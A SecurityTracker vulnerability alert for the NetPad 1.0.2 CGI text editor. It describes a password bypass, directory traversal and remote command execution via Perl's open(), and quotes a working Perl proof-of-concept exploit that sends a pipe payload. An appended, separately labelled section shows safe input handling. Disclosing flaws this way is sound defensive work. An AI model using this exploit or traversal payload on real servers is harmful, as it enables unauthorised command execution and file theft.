SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Generic)  >   NetPad
Vendors:   Levcgi.com
NetPad Text Editing CGI Script Input Validation Flaws Let Remote Users View Files and Execute Shell Commands
SecurityTracker Alert ID:  1004288
SecurityTracker URL:  http://securitytracker.com/id/1004288
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 14 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.0.2
Description:   A vulnerability was reported in LevCgi.com's NetPad web-based text editor. A remote user can view files on the server and execute shell commands on the system.

b0iler and BrainRawt reported several input validation vulnerabilities in the NetPad CGI script.

A remote user can supply directory traversal strings ('../') to change directories and view any file that is readable by the web server.

A remote user can execute commands on the server due to the lack of filtering on user-supplied input that is passed to an open() function call. A demonstration exploit for this vulnerability is provided in the Source Message.

The password security feature is apparently not required to be able to read files, only to write files, which may be counter to the vendor's description of the feature.

The vendor has reportedly been notified.

Impact:   A remote user can view files located anywhere on the partition that are readable by the web server. A remote user can execute arbitrary commands with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.levcgi.com/programs.cgi?program=netpad
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  LevCGI.coms NetPad 1.0.2 multiple vulnerabilities



Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler(b0iler@hotmail.com) and BrainRawt(brainrawt@hotmail.com)

About Netpad:
------------------
<quote from levcgi.com>

Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely efficient and a must have tool for all
webmasters!

</quote from levcgi.com>

According to the website,  ...NetPad has been downloaded 1225 times!


Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2


Vendor Contact:
----------------
4-28-02 - Emailed lev@taintedthoughts.com


Vulnerabilities:

-- Password Bypass

1. The website claims "password security feature to prevent unauthorized access!",
    but this is NOT true.

    A password is not required to read files.  It is only required to write to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional "../../../" into
    the input field to crawl back through directories of the server hosting netpad.cgi,
    allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is possible
    for a malicious visitor to remotely execute commands on the server hosting
    netpad.cgi

    Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):
---------------------------------------

#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and a little effort.
#
# requires LWP available at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi ../../../../bin/command

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);

my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");

my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have worked.\n"; }
else {  print "request failed.\n"; }

Fix:
------

No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? - BrainRawt
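
The advisory traces both the directory traversal and the command execution to unfiltered input reaching Perl's open(). The following added example, which is not NetPad's code and not part of the original advisory, shows a file-read helper that confines names to a base directory and uses three-argument open(); the helper names, the allowlist pattern and the temporary directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (not NetPad's code): safe handling of a user-supplied file name.
use strict;
use warnings;
use Cwd qw(abs_path);
use File::Spec;
use File::Temp qw(tempdir);

# Resolve $name under $basedir; return the canonical path, or nothing if the
# name is malformed or resolves outside $basedir. (Hypothetical helper.)
sub resolve_under {
    my ($basedir, $name) = @_;
    return unless defined $name && length $name;
    # Allowlist: path segments of letters, digits, '.', '_' and '-'.
    # This rejects '|', ';', spaces, NUL and other open()/shell metacharacters.
    return unless $name =~ m{\A[A-Za-z0-9._-]+(?:/[A-Za-z0-9._-]+)*\z};
    my $base = abs_path($basedir);
    return unless defined $base;
    my $full = abs_path(File::Spec->catfile($base, $name));
    # The canonical path ('..' and symlinks resolved) must stay inside $base.
    return unless defined $full && index($full, "$base/") == 0;
    return $full;
}

sub read_file_safely {
    my ($basedir, $name) = @_;
    my $path = resolve_under($basedir, $name) or return;
    # Three-argument open: '<' fixes the mode, so the file name is never
    # parsed for a leading or trailing '|' (pipe to or from a command).
    open(my $fh, '<', $path) or return;
    local $/;                      # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return $data;
}

# Constructed inputs, run against a throwaway directory.
my $base = tempdir(CLEANUP => 1);
open(my $out, '>', "$base/notes.txt") or die "setup: $!";
print {$out} "hello\n";
close $out;

for my $name ('notes.txt', '../../../etc/passwd', '../../bin/id |', 'notes.txt|') {
    my $data = read_file_safely($base, $name);
    printf "%-24s %s\n", "'$name'", defined $data ? 'read ok' : 'rejected';
}
```

The allowlist alone does not stop '../' segments, which is why the canonical-path check is kept as a separate step; the read path would still need the same authentication as the write path to address the password bypass.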





Copyright 2021, SecurityGlobal.net LLC